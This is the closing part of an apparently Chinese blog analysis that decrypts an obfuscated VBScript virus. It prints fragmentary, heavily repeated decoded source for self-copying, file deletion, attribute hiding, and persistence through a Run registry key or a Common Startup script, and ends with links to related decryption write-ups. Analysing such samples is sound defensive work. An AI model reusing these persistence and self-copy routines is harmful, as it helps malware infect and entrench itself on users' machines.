if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' (repeat: co fragment - the second self-copy from the install branch)
dim d:j="\":on error resume next
df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7
' (repeat: df fragment)
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
' (repeat: ar fragment)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
' (repeats: ei fragment x4)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' (repeat: ar fragment)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
' (repeats: ei fragment x2)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' rs(sw) fragment: persistence.  sw=1 writes HKLM\...\policies\explorer\run\
' <computername> = ".vbe" (the System-folder copy is found through the PATH); if
' that write errors and no startup .vbs exists, bf drops a .vbs in Common Startup
' whose text is the wsr run-stub plus ".vbe".  sw=-1 deletes the startup .vbs;
' sw=0 deletes the startup .vbs, the run-key value and the sample's own key.
dim d:j="\":on error resume next
if sw=1 and rr(rsp&rsn,0)<>ve then
ws.regwrite rsp&rsn,ve,"REG_SZ"
if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0
elseif sw=-1 then:df fsp
elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1
end if
' (repeat: rr fragment)
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
' (repeat: rr fragment)
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
'........ heavy repetition starts here
'if er(0) then rr=0
'dim d:j="\":on error resume next
'if pa=1 then rna=rpa&rna
'rr=ws.regread(rna)
'........ (fragment elided)
if er(0) then rr=0
' (repeat: df fragment)
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
' (repeat: ar fragment)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
' (repeats: ei fragment x4)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
' wr(rna,rda) fragment: rda=-1 deletes registry value rna (as given, no prefix);
' otherwise writes rpa&rna = rda as REG_SZ under the sample's own key.
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
' (repeat: wr fragment)
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
结束……源文件:http://evilcos.googlepages.com/ok.txt。至于初始VBS乱码中的OO变量的值,我感觉没用。这个VBS的行为是什么,可以用HIPS工具跟踪看看,否则你就慢慢读这些令人发指的源码吧。
【相关信息】
1、此乱码版本为8.25。
2、解密过程中有弹出此信息:holle,raider!(这个是作者吗?)
【相关文章】
1、一个变态的加密VBS:http://hi.baidu.com/greysign/blog/item/fba23b3f46acd5e855e7232f.html。
2、杀脑细胞的东西:http://hi.baidu.com/dikex/blog/item/7c1838087ad6af34e824884f.html。
3、一个加密的vbs病毒照本宣科的解密之旅:http://hi.baidu.com/fuxudong/blog/item/431ddb2451aa06054c088d02.html。